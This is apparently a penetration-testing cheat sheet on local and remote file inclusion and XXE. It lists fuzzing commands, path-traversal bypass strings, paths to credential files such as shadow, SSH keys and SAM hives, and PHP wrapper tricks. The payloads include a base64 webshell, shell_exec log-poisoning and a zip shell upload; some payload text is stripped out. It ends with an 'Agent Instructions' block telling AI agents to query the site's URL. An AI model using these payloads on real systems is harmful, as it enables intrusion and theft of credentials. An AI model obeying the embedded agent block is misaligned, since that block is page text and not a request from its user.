# LFI / XXE ## 01. Local File Inclusion (LFI) ### 01.1 Linux * Click [here ](https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_linux.txt)for wordlist ```bash ## ------------------| Linux wfuzz -u http:///index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hl 367 wfuzz -u http:///index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hl 367 wget https://raw.githubusercontent.com/foospidy/payloads/master/other/traversal/dotdotpwn.txt wfuzz -u http:///index.php?page=../../../..FUZZ -w dotdotpwn.txt --hl 367 ## ------------------| Windows wfuzz -u http:///index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt --hl 367 ``` * Useful LFI files ```bash ../../../etc/passwd ../../../../../../../../../../../../etc/passwd /etc/passwd /etc/shadow /etc/issue /etc/group /etc/hostname /etc/ssh/ssh_config /etc/ssh/sshd_config /root/.bash_history /root/.ssh/id_rsa /root/.ssh/authorized_keys /home/user/.bash_history /home/user/.ssh/authorized_keys /home/user/.ssh/id_rsa /proc/self/environ /proc/self/cmdline ``` * [Bypass tricks](https://raw.githubusercontent.com/foospidy/payloads/master/other/traversal/dotdotpwn.txt) ```bash ../index.php ../../index.php %2e%2e%2findex.php %252e%252e%252findex.php ../../../../etc/passwd /var/www/../../etc/passwd ../../../../../etc/passwd%00 ....//....//....//etc/passwd ....\/....\/....\/etc/passwd ....//....//etc/passwd %252e%252e%252fetc%252fpasswd %252e%252e%252fetc%252fpasswd%00 ..///////..////..//////etc/passwd ..%252f..%252f..%252fetc%252fpasswd ..%c0%af..%c0%af..%c0%afetc%c0%afpasswd %5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd ``` * Configuration Files ```bash ## ------------------| Apache /etc/apache2/apache2.conf /usr/local/etc/apache2/httpd.conf /etc/apache2/sites-enabled/000-default.conf /etc/apache2/sites-available/000-default.conf /etc/httpd/conf/httpd.conf /var/log/apache2/access.log /var/log/apache/access.log /var/log/apache2/error.log /var/log/apache/error.log /usr/local/apache/log/error_log /usr/local/apache2/log/error_log ## ------------------| nginx /var/log/nginx/access.log /var/log/nginx/error.log /var/log/httpd/error_log /etc/nginx/sites-available/default /etc/nginx/nginx.conf /etc/nginx/proxy_params ## ------------------| MySql /var/lib/mysql/mysql/user.frm /var/lib/mysql/mysql/user.MYD /var/lib/mysql/mysql/user.MYI ## ------------------| Tomcat /usr/share/tomcat9/bin/catalina.sh /usr/share/tomcat9/etc/tomcat-users.xml /var/lib/tomcat9/conf/tomcat-users.xml /var/lib/tomcat9/conf/server.xml /var/lib/tomcat9/conf/web.xml /var/lib/tomcat9/conf/ ## ------------------| Spring Boot application.properties application.yml config/application.properties config/application.yml ## ------------------| Webroot locations /var/www/html/ # Apache /usr/local/nginx/html/ # Nginx c:\inetpub\wwwroot\ # IIS C:\xampp\htdocs\ # XAMPP C:\wamp\www\ # WAMP ``` * Log Files ```bash ## ------------------| Generic: /var/log/apache/access.log /var/log/apache/error.log /var/log/apache2/access.log /var/log/apache/error.log ## ------------------| Red Hat/CentOS/Fedora Linux /var/log/httpd/access_log ## ------------------| Debian/Ubuntu /var/log/apache2/access.log ## ------------------| FreeBSD /var/log/httpd-access.log ## ------------------| XAMPP /xampp/apache/logs/access.log /xampp/apache/logs/error.log ``` * Download running binary file.

## ------------------| Identify runnable tasks and copy the PID 
/proc/sched_debug

## ------------------| Get the location for runnable process and download the file
/proc/<PID>/cmdline

## ------------------| Get linked libs
/proc/<PID>/maps

### 01.2 Windows * Click [here ](https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_windows.txt)for wordlist * File Paths ```csharp /Windows/win.ini /windows/system32/license.rtf /Windows/debug/NetSetup.log /Users/Administrator/NTUser.dat /Documents and Settings/Administrator/NTUser.dat /apache/logs/access.log /apache/logs/error.log /apache/php/php.ini /boot.ini /inetpub/wwwroot/global.asa /MySQL/data/hostname.err /MySQL/data/mysql.err /MySQL/data/mysql.log /MySQL/my.cnf /MySQL/my.ini /php4/php.ini /php5/php.ini /php/php.ini /Program Files/Apache Group/Apache2/conf/httpd.conf /Program Files/Apache Group/Apache/conf/httpd.conf /Program Files/Apache Group/Apache/logs/access.log /Program Files/Apache Group/Apache/logs/error.log /Program Files/FileZilla Server/FileZilla Server.xml /Program Files/MySQL/data/hostname.err /Program Files/MySQL/data/mysql-bin.log /Program Files/MySQL/data/mysql.err /Program Files/MySQL/data/mysql.log /Program Files/MySQL/my.ini /Program Files/MySQL/my.cnf /Program Files/MySQL/MySQL Server 5.0/data/hostname.err /Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log /Program Files/MySQL/MySQL Server 5.0/data/mysql.err /Program Files/MySQL/MySQL Server 5.0/data/mysql.log /Program Files/MySQL/MySQL Server 5.0/my.cnf /Program Files/MySQL/MySQL Server 5.0/my.ini /Program Files (x86)/Apache Group/Apache2/conf/httpd.conf /Program Files (x86)/Apache Group/Apache/conf/httpd.conf /Program Files (x86)/Apache Group/Apache/conf/access.log /Program Files (x86)/Apache Group/Apache/conf/error.log /Program Files (x86)/FileZilla Server/FileZilla Server.xml /Program Files (x86)/xampp/apache/conf/httpd.conf /WINDOWS/php.ini /WINDOWS/Repair/SAM /Windows/repair/system /Windows/repair/software /Windows/repair/security /WINDOWS/System32/drivers/etc/hosts /WINNT/php.ini /WINNT/win.ini /xampp/password /xampp/tomcat/conf/tomcat-users.xml /xampp/htdocs/index.php /xampp/apache/conf/httpd.conf /xampp/apache/bin/php.ini /xampp/phpMyAdmin/config.inc.php /xampp/apache/logs/access.log /xampp/apache/logs/error.log /Windows/Panther/Unattend/Unattended.xml /Windows/Panther/Unattended.xml /Windows/system32/config/AppEvent.Evt /Windows/system32/config/SecEvent.Evt /Windows/system32/config/default.sav /Windows/system32/config/security.sav /Windows/system32/config/software.sav /Windows/system32/config/system.sav /Windows/system32/config/regback/default /Windows/system32/config/regback/sam /Windows/system32/config/regback/security /Windows/system32/config/regback/system /Windows/system32/config/regback/software /Program Files/MySQL/MySQL Server 5.1/my.ini /Windows/System32/inetsrv/config/schema/ASPNET_schema.xml /Windows/System32/inetsrv/config/applicationHost.config /inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log ``` ### 01.3 Wrappers & Filters ```bash ## ------------------| Basic ?page=data:text/plain,h4rithd ?page=data:text/plain, ?page=data:text/plain, ## ------------------| Base64 and rot13 ?page=php://filter/read=string.rot13/resource=index.php ?page=php://filter/convert.base64-encode/resource=index.php ?page=pHp://FilTer/convert.base64-encode/resource=index.php ## ------------------| zlib ?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd ## To read # php -a #Starts a php console # readfile('php://filter/zlib.inflate/resource=test.deflated'); ## ------------------| zip:// # echo "

" > payload.php; # zip payload.zip payload.php; # mv payload.zip shell.jpg; # rm payload.php ?page=zip://shell.jpg%23payload.php ## ------------------| data:// ?page=data://text/plain, ?page=data://text/plain, ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= # NOTE: the payload is "" ## ------------------| expect:// ?page=expect://id ?page=expect://ls ## ------------------| input:// ?page=php://input # POST DATA: ``` ### 01.4 LFI to RCEs `include=('$file')` * Log Poisoning ```bash ## ------------------| Basic Payload ' . shell_exec($_REQUEST['cmd']) . ''; ?> ## ------------------| Send for apache nc 80 ...enter..payload..here!... ## Your session/auth cookies or any type of session information store on ## ------------------| Linux /tmp/sess_ /var/tmp/sess_ /var/lib/php/sessions/sess_ /proc/self/environ/ ## <-- use for User-Agent: /var/log/auth.log ## <-- use ssh ''@IP /var/log/vsftpd.log ## <-- use above payload as username with ftp var/log/apache2/access.log ## <-- use it from nc(BEST WAY!!) or use it as http://IP/ ## ------------------| Windows \Windows\TEMP\sess_ c:\xampp\apache\logs\access.log&cmd=ipconfig ``` ### 01.5 Tricks * phpinfo() (file\_uploads = on) ```bash # Download this script https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py ``` {% embed url="" %} ### 01.6 LFI with python * Click [`here`](https://docs.h4rithd.com/languages/python#02.-lfi-with-python)! ## 02. Remote File Inclusion `allow_url_include` ```bash nc -lvnp 80 ## ------------------| Create payload file (php/txt) ' . shell_exec($_REQUEST['cmd']) . ''; ?> ## ------------------| Execute ### move file to /var/www/html and start apache sever ### execute =http:///file.txt ``` ## 02. XML external entity (XXE) injection * Common payloads ```bash ]> &xxe; ``` * Filters ```bash ]> ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://p0db0t.gitbook.io/pentest/owasp-10/lfi-xxe.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.